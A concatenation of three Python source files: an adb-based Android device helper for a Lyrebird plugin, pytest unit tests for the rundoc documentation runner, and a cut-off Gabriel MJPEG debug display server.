context.application.socket_io.emit('log', self._log_cache, namespace='/android-plugin')
log_file.writelines(self._log_cache)
log_file.flush()
self._log_cache = []
threading.Thread(target=log_handler, args=(p,)).start()
def log_filter(self, line, pid_target):
if not line:
return False
line_list = str(line).strip().split()
if len(line_list) <= 2:
return False
if line_list[2] not in pid_target:
return False
return True
def crash_checker(self, line):
crash_log_path = os.path.join(crash_dir, 'android_crash_%s.log' % self.device_id)
if str(line).find('FATAL EXCEPTION') > 0:
self.start_catch_log = True
self._log_crash_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
return True
elif str(line).find('AndroidRuntime') > 0 and self.start_catch_log:
self._log_crash_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
return True
else:
self.start_catch_log = False
with codecs.open(crash_log_path, 'w', 'utf-8') as f:
f.write(''.join(self._log_crash_cache))
return False
def anr_checker(self, line):
if str(line).find('ANR') > 0 and str(line).find('ActivityManager') > 0:
self.get_anr_log()
return True
else:
return False
def get_anr_log(self):
anr_file_name = os.path.join(anr_dir, 'android_anr_%s.log' % self.device_id)
p = subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {anr_file_name}', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
self._anr_file = os.path.abspath(anr_file_name)
@property
def device_info(self):
if not self._device_info:
self._device_info = self.get_properties()
return self._device_info
def get_properties(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def get_all_packages(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell pm list packages', shell=True, stdout=subprocess.PIPE)
res = []
if p.returncode == 0:
output = p.stdout.decode()
res = [item.split(':')[1] for item in output.strip().split('\n') if item]
return res
def package_info(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys package {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
return App.from_raw(package_name, p.stdout.decode())
def package_meminfo(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys meminfo {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def device_cpuinfo(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys cpuinfo', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def stop_log(self):
if self._log_process:
self._log_process.kill()
self._log_process = None
def take_screen_shot(self):
if not os.path.exists(screenshot_dir):
os.makedirs(screenshot_dir)
timestrap = int(time.time())
screen_shot_file = os.path.abspath(os.path.join(screenshot_dir, f'android_screenshot_{self.device_id}_{timestrap}.png'))
p = subprocess.run(f'{adb} -s {self.device_id} exec-out screencap -p > {screen_shot_file}', shell=True)
if p.returncode == 0:
return dict({
'screen_shot_file': screen_shot_file,
'device_id': self.device_id,
'timestrap': timestrap
})
return {}
def start_app(self, start_activity, ip, port):
p = subprocess.run(f'{adb} -s {self.device_id} shell am start -n {start_activity} --es mock http://{ip}:{port}/mock/ --es closeComet true', shell=True)
return True if p.returncode == 0 else False
def stop_app(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell am force-stop {package_name}', shell=True)
return True if p.returncode == 0 else False
def get_device_ip(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell ip -b -4 address', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for net_line in output:
if 'wlan0' in net_line:
ipv4_list = net_line.split()
break
else:
return ''
for index, char in enumerate(ipv4_list):
# ipv4_address, which we need, is behind of 'inet'
if char == 'inet':
# example of ipv4_address: 192.168.110.111/23
return ipv4_list[index+1].split('/')[0]
return ''
def get_device_resolution(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys window displays', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for index, char in enumerate(output):
if char and char.startswith('Display'):
# display_str, which we need, is in the next line of 'Display'
display_str = output[index+1]
break
else:
return ''
# example of display: 'init=1080x1920 420dpi cur=1080x1920 app=1080x1794 rng=1080x1017-1794x1731',
for resolution_str in display_str.split():
if resolution_str.startswith('init'):
return resolution_str[len('init='):]
return ''
def get_release_version(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop ro.build.version.release', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
return p.stdout.decode().strip()
def to_dict(self):
device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
# get additional device info
prop_lines = self.device_info
if not prop_lines:
return device_info
for line in prop_lines:
# 基带版本
if 'ro.build.expect.baseband' in line:
baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
device_info['baseBand'] = baseband
# 版本号
if 'ro.build.id' in line:
build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['buildId'] = build_id
# Android 版本
if 'ro.build.version.release' in line:
build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['releaseVersion'] = build_version
return device_info
def devices():
check_android_home()
res = subprocess.run(f'{adb} devices -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = res.stdout.decode()
err_str = res.stderr.decode()
online_devices = {}
# ADB command error
if res.returncode != 0:
print('Get devices list error', err_str)
return online_devices
lines = [line for line in output.split('\n') if line]
if len(lines) > 1:
for line in lines[1:]:
device = Device.from_adb_line(line)
online_devices[device.device_id] = device
devices_list = [on_device for on_device in list(online_devices.keys())]
last_devices_str = lyrebird.state.get('android.device') if lyrebird.state.get('android.device') else []
last_devices_list = [last_device.get('id') for last_device in last_devices_str]
if devices_list != last_devices_list:
devices_info_list = []
for device_id in online_devices:
device_detail = online_devices[device_id]
if device_detail.device_info == None:
continue
item = {
'id': device_id,
'info': {
'product': device_detail.product,
'model': device_detail.model,
'os': device_detail.get_release_version(),
'ip': device_detail.get_device_ip(),
'resolution': device_detail.get_device_resolution()
}
}
package_name = config.load().package_name
app = device.package_info(package_name)
if app.version_name:
item['app'] = {
'packageName': package_name,
'startActivity': app.launch_activity,
'version': app.version_name
}
devices_info_list.append(item)
lyrebird.publish('android.device', devices_info_list, state=True)
return online_devices
|
test_unit.py
|
import pytest
from rundoc import BadInterpreter, BadEnv, RundocException, CodeFailed
import rundoc.block as rb
import rundoc.commander as rc
import rundoc.parsers as rp
import rundoc.__main__ as rm
from pygments import highlight
from pygments.formatters import Terminal256Formatter
from pygments.lexers import get_lexer_by_name
from pygments.styles.manni import ManniStyle
from pygments.styles.native import NativeStyle
from types import *
import inspect
import io
import json
import os
import re
import stat
import tempfile
import threading
import time
###
# Fixtures
###
@pytest.fixture
def environment():
e = {
'custom_var1': '1',
'CUSTOM_VAR2': '2',
'custom_var3': 'some text',
}
for key in e:
os.environ[key] = e[key]
return e
@pytest.fixture
def orderedenv(environment):
oenv = rc.OrderedEnv()
for var in environment:
oenv.append(var, environment[var])
return oenv
@pytest.fixture
def test_vars():
return [
('test1', 'value111'),
('test2', 'value222'),
('test3', 'value333'),
]
@pytest.yield_fixture
def sandbox():
with tempfile.TemporaryDirectory() as directory:
yield directory
@pytest.yield_fixture
def dummy_file(sandbox, environment):
fpath = os.path.join(sandbox, 'dummy_file')
with open(fpath, 'a+') as f:
f.write('some {dummy} data\n')
for key in environment:
f.write(' abc %:' + key + ':%')
yield fpath
@pytest.fixture
def docblock_bash():
code = 'echo "it is working"'
# use bash as interpreter
tags = [ 'bash', 'test', 'main' ]
light = False
return rb.DocBlock(code, tags, light)
@pytest.fixture
def docblock_bash_light():
code = 'echo "it is working"'
# use bash as interpreter
tags = [ 'bash', 'test', 'main' ]
# color print optimized for light background terminal
light = True
return rb.DocBlock(code, tags, light)
@pytest.fixture
def docblock_unknown():
code = 'echo "it is working"'
# use binary in path as interpreter but one that has no code highlighting
tags = [ 'cd', 'test', 'main' ]
light = False
return rb.DocBlock(code, tags, light)
@pytest.fixture
def mkd_file():
data = b'bash#test\nls\n```\n\n```bash#test\nls -al\n```'
f = io.BytesIO()
f.write(data)
f.seek(0)
return f
###
# Tests for block.py
###
REGISTERED_BLOCK_ACTIONS = 5
def test_block_action():
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS
def dummy_block_action(args, contents):
return 0
rb.block_action(dummy_block_action)
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS + 1
assert type(rb.block_actions['dummy-block-action']) == FunctionType
assert rb.block_actions['dummy-block-action'] == dummy_block_action
del(rb.block_actions['dummy-block-action'])
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS
def test_fill_env_placeholders__valid(environment):
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
assert rb.fill_env_placeholders(before) == after
def test_fill_env_placeholders__unclosed(environment):
invalid_env = 'Text %:invalid_var '
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
before = invalid_env + before + invalid_env
after = invalid_env + after + invalid_env
assert rb.fill_env_placeholders(before) == after
def test_fill_env_placeholders__unopened(environment):
invalid_env = 'Text invalid_var:% '
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
before = invalid_env + before + invalid_env
after = invalid_env + after + invalid_env
assert rb.fill_env_placeholders(before) == after
def test_write_file_action__no_fill(sandbox):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = 'some random text\nmore text'
rb._write_file_action({0:testfile, 1:'774'}, before, fill=False)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_write_file_action__fill(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = 'some random text\nmore text'
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._write_file_action({0:testfile, 1:'774'}, before, fill=True)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_create_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_create_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_r_create_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_r_create_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_create_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_r_create_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_append_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_append_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
with open(dummy_file, 'r') as f:
initial_contents = f.read()
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == initial_contents + before + '\n'
def test_r_append_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_r_append_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
with open(dummy_file, 'r') as f:
initial_contents = f.read()
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == initial_contents + after + '\n'
def test_append_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_r_append_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_docblock_init_with_bad_interpreter():
with pytest.raises(BadInterpreter):
rb.DocBlock(tags=['bad_interpreter'], code='')
def test_get_block_action__known_actions():
for action in {
'create-file',
'r-create-file',
'append-file',
'r-append-file',
}:
assert isinstance(rb.get_block_action(action + ':text'), LambdaType)
def test_get_block_action__undefined_action():
assert rb.get_block_action('unknown:text') == None
def test_docblock__get_lexer__bash(docblock_bash):
db_lexer = docblock_bash.get_lexer()
pygments_lexer = get_lexer_by_name('bash')
assert db_lexer.__class__ == pygments_lexer.__class__
def test_docblock__get_lexer__unknown(docblock_unknown):
db_lexer = docblock_unknown.get_lexer()
assert db_lexer == None
def test_docblock__str(docblock_bash):
code = docblock_bash.code
interpreter = docblock_bash.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(code, lexer_class, Terminal256Formatter(style=NativeStyle))
assert str(docblock_bash) == s
def test_docblock_str__last_run(docblock_bash):
user_code = 'echo "changed"'
docblock_bash.runs.append(
{
'user_code': user_code,
'output': '',
'retcode': None,
'time_start': None,
'time_stop': None,
}
)
docblock_bash.last_run['user_code'] = user_code
interpreter = docblock_bash.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(user_code, lexer_class, Terminal256Formatter(style=NativeStyle))
assert str(docblock_bash) == s
def test_docblock__str__light(docblock_bash_light):
code = docblock_bash_light.code
interpreter = docblock_bash_light.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(code, lexer_class, Terminal256Formatter(style=ManniStyle))
assert str(docblock_bash_light) == s
def test_docblock__get_dict(docblock_bash):
assert type(docblock_bash.get_dict()) == type({})
bash_block_dict = {
'interpreter': 'bash',
'code': 'echo "this is a test"',
'tags': [ 'bash', 'test', 'main' ],
'runs': []
}
docblock = rb.DocBlock(
bash_block_dict['code'],
bash_block_dict['tags'],
)
actual_dict = docblock.get_dict()
assert bash_block_dict == actual_dict
docblock.run(prompt=False)
while docblock.process:
time.sleep(0.1)
actual_dict = docblock.get_dict()
for key in ('interpreter', 'code', 'tags'):
assert bash_block_dict[key] == actual_dict[key]
assert actual_dict['runs'][0]['user_code'] == docblock.code
assert actual_dict['runs'][0]['output'] == 'this is a test\n'
assert actual_dict['runs'][0]['retcode'] == 0
assert actual_dict['runs'][0]['time_start'] > 0
assert actual_dict['runs'][0]['time_stop'] > 0
def docblock_worker(docblock):
docblock.run(prompt=False)
def test_docblock__run_and_kill():
# Note that kill will only send SIGKILL to the running process without
# any knowledge on how this will be handeled. What is guaranteed is that
# process.poll() will contain some exitcode.
docblock = rb.DocBlock(
'echo "start"\nsleep 2\necho "this is test"',
['bash', 'test'],
)
assert docblock.process == None
t = threading.Thread(target=docblock_worker, args=(docblock,))
t.start()
time.sleep(1)
assert docblock.process and docblock.process.poll() is None
docblock.kill()
time.sleep(0.1)
assert docblock.process and type(docblock.process.poll()) is int
def test_docblock__run_action(dummy_file):
docblock = rb.DocBlock(
'some content',
['r-create-file:{}'.format(dummy_file), 'test'],
)
docblock.run(prompt=False)
assert docblock.last_run['retcode'] == 0
def test_docblock__run_unknown_action():
with pytest.raises(BadInterpreter):
docblock = rb.DocBlock(
'some content',
['unknown-action:bad-data', 'test'],
)
###
# Tests for commander.py
###
def test_orderedenv__str(orderedenv, environment):
for var in environment:
assert orderedenv[var] == environment[var]
assert len(orderedenv) == len(environment)
assert "\n".join([ var+"="+environment[var] for var in environment ]) == \
str(orderedenv)
def test_orderedenv__append(orderedenv):
s = str(orderedenv)
s_append = '\ntest=value123'
orderedenv.append('test','value123')
assert str(orderedenv) == s + s_append
def test_orderedenv__extend(orderedenv, test_vars):
s = str(orderedenv)
s_extend = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
orderedenv_extend = rc.OrderedEnv()
for var, value in test_vars:
orderedenv_extend.append(var, value)
orderedenv.extend(orderedenv_extend)
assert str(orderedenv) == s + s_extend
def test_orderedenv__import_string(orderedenv, test_vars):
s = str(orderedenv)
s_import = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
orderedenv.import_string(s_import)
assert str(orderedenv) == s + s_import
def test_orderedenv__import_string__no_equal(orderedenv, test_vars):
s_import = "bad env format"
with pytest.raises(BadEnv):
orderedenv.import_string(s_import)
def test_orderedenv__import_string__missing_var(orderedenv, test_vars):
s_import = "=value777"
with pytest.raises(BadEnv):
orderedenv.import_string(s_import)
def test_orderedenv__load(orderedenv, test_vars):
s = str(orderedenv)
s_load = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
for var, value in test_vars:
os.environ[var] = value
for var, value in test_vars:
orderedenv.append(var, '')
orderedenv.load()
assert str(orderedenv) == s + s_load
def test_orderedenv__inherit_existing_env(orderedenv, test_vars):
s = str(orderedenv)
s_load = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
for var, value in test_vars:
os.environ[var] = value
for var, value in test_vars:
orderedenv.append(var, 'bad value')
orderedenv.inherit_existing_env()
assert str(orderedenv) == s + s_load
def test_doccommander_doc_block__step():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
dc.step = 1
assert dc.doc_block == dc.doc_blocks[0]
def test_doccommander_doc_block__no_step():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
assert dc.doc_block == None
def test_doccommander_get_dict():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
assert dc.get_dict() == {
"code_blocks": [
{
"code": "ls\n",
"tags": ["bash", "test1"],
"interpreter": "bash",
"runs": []
}
], "env": {}
}
def test_doccommander_add():
dc = rc.DocCommander()
assert len(dc.doc_blocks) == 0
dc.add('ls\n', ['bash','test1'])
assert len(dc.doc_blocks) == 1
assert dc.doc_blocks[0].code == 'ls\n'
assert dc.doc_blocks[0].tags == [ 'bash', 'test1' ]
dc.add('ls -al\n', ['bash','test2'])
assert len(dc.doc_blocks) == 2
assert dc.doc_blocks[0].code == 'ls\n'
assert dc.doc_blocks[0].tags == [ 'bash', 'test1' ]
assert dc.doc_blocks[1].code == 'ls -al\n'
assert dc.doc_blocks[1].tags == [ 'bash', 'test2' ]
def doccommander_worker(dc):
try:
dc.run()
except ValueError as e:
# in case output file was closed prematuraly
pass
def test_doccommander_add__while_running():
dc = rc.DocCommander()
dc.add('sleep 2\n', ['bash','test1'])
t = threading.Thread(target=doccommander_worker, args=(dc,))
t.start()
time.sleep(1)
with pytest.raises(RundocException):
dc.add('echo "bad"\n', ['bash','test1'])
def test_doccommander_add__unknown_interpreter():
dc = rc.DocCommander()
with pytest.raises(SystemExit):
dc.add('sleep 1\n', ['unknown','test1'])
def test_doccommander_die_with_grace(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test"\n', ['bash','test1'])
dc.add('sleep 2\n', ['bash','test1'])
with open(dummy_file, 'w') as f:
dc.output = f
t = threading.Thread(target=doccommander_worker, args=(dc,))
t.start()
time.sleep(1)
dc.die_with_grace()
with open(dummy_file, 'r') as f:
output = json.loads(f.read())
assert output['code_blocks'][0]['runs'][0]['output'] == 'test\n'
def test_doccommander_write_output(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test"\n', ['bash','test1'])
dc.run()
with open(dummy_file, 'w') as f:
dc.output = f
dc.write_output()
with open(dummy_file, 'r') as f:
output = json.loads(f.read())
assert len(output['code_blocks']) == 1
def test_doccommander_run(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test1"\n', ['bash','test1'])
dc.add('echo "test2"\n', ['bash','test1'])
dc.add('echo "test3"\n', ['bash','test1'])
with open(dummy_file, 'w') as f:
dc.run(inherit_env=True, output=f)
assert len(dc.get_dict()['code_blocks']) == 3
for cb in dc.get_dict()['code_blocks']:
assert len(cb['runs']) == 1
def test_doccommander_run__failed():
dc = rc.DocCommander()
dc.add('cat /non_existent', ['bash','test1'])
with pytest.raises(CodeFailed):
dc.run(retry=5, retry_pause=0.1)
###
# Tests for parsers.py
###
def test_parsers__mkd_to_html__select_none():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data) == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_bash():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'bash') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_test1():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'test1') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'test2') == '<pre><code class="bash test1">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_bash_diselect_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'bash', '', 'test2') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_must_have_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, '', 'test2', '') == '<pre><code class="bash test1">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__parse_doc():
f = io.StringIO()
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
expected = rc.DocCommander()
expected.add('ls\n', ['bash','test1'])
expected.add('ls -al\n', ['bash','test2'])
f.write(data)
f.seek(0)
c = rp.parse_doc(f, 'bash')
assert c.get_dict() == expected.get_dict()
def test_parsers__parse_doc__single_session():
f = io.StringIO()
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
expected = rc.DocCommander()
expected.add('ls\nls -al\n', ['bash'])
expected.env.import_string("a=b")
f.write(data)
f.seek(0)
c = rp.parse_doc(f, single_session='bash')
assert c.get_dict() == expected.get_dict()
def test_parsers__parse_output():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
c1 = rp.parse_doc(input)
json1 = json.dumps(c1.get_dict())
output = io.StringIO()
output.name = 'test'
c1.output = output
c1.run()
output.seek(0)
c2 = rp.parse_output(output)
json2 = json.dumps(c2.get_dict())
assert json1 == json2
def test_parsers__get_tags():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
tags = rp.get_tags(input)
assert len(tags) == 4
for tag, num in tags:
if tag == 'bash':
assert num == 2
elif tag in [ 'env', 'test1', 'test2' ]:
assert num == 1
else:
assert tag == ''
def test_parsers__get_blocks():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
got_blocks = rp.get_blocks(input, pretty=True)
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
got_blocks = ansi_escape.sub('', got_blocks)
expect = '1. [bash] bash#test1\n=================\nls\n\n2. [bash] bash#test2\n=================\nls -al\n\n'
assert got_blocks == expect
def test_parsers__get_blocks__json():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
got_blocks = rp.get_blocks(input)
input.seek(0)
expect = rp.parse_doc(input)
assert json.loads(got_blocks) == expect.get_dict()
def test_parsers__get_clean_doc():
data = '```env\na=b\n```\nyes\n```bash#test1\nls\n```\n\n- Test ```bash:me\n\n```bash (\\/me^) {&}_[2=\']-$%!*:test2\nls -al\n```'
expect = '```env\na=b\n```\nyes\n```bash\nls\n```\n\n- Test ```bash:me\n\n```bash (\\/me^) {&}_[2=\']-$%!*\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
assert rp.get_clean_doc(input) == expect
###
# Tests for __main__.py
###
def test_main_add_options():
rm.add_options(rm._run_control_options)
rm.add_options(rm._run_specific_options)
rm.add_options(rm._output_style_options)
rm.add_options(rm._tag_options)
|
debug_display_server.py
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import multiprocessing
import os
import pprint
import queue
import re
from socketserver import ThreadingMixIn
import sys
import threading
import time
import gabriel
import gabriel.control
LOG = gabriel.logging.getLogger(__name__)
dir_file = os.path.dirname(os.path.realpath(__file__))
class MJPEGStreamHandler(BaseHTTPRequestHandler, object):
def do_POST(self):
pass
def do_GET(self):
try:
self.path = self.path.split('?')[0]
print(self.path)
if self.path.endswith(".mjpeg"):
if self.path.endswith("camera.mjpeg"):
data_queue = gabriel.control.input_display_queue
elif self.path.endswith("output.mjpeg"):
data_queue = gabriel.control.output_display_queue_dict['image']
elif self.path.endswith("debug.mjpeg"):
data_queue = gabriel.control.output_display_queue_dict['debug']
self.send_response(200)
self.wfile.write("Content-Type: multipart/x-mixed-replace; boundary=--aaboundary")
self.wfile.write("\r\n\r\n")
while 1:
if self.server.stopped:
break
try:
image_data = data_queue.get_nowait()
self.wfile.write("--aaboundary\r\n")
self.wfile.write("Content-Type: image/jpeg\r\n")
self.wfile.write("Content-length: " + str(len(image_data)) + "\r\n\r\n")
self.wfile.write(image_data)
self.wfile.write("\r\n\r\n\r\n")
time.sleep(0.001)
except queue.Empty as e:
pass
elif self.path.endswith(".jpeg"):
data_queue = gabriel.control.input_display_queue
try:
image_data = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'image/jpeg')
self.end_headers()
self.wfile.write(image_data)
except queue.Empty as e:
pass
elif self.path.endswith("speech"):
data_queue = gabriel.control.output_display_queue_dict['text']
try:
speech_data = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(speech_data)
except queue.Empty as e:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("")
elif self.path.endswith("video"):
data_queue = gabriel.control.output_display_queue_dict['video']
try:
video_url = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(video_url)
except queue.Empty as e:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("")
else:
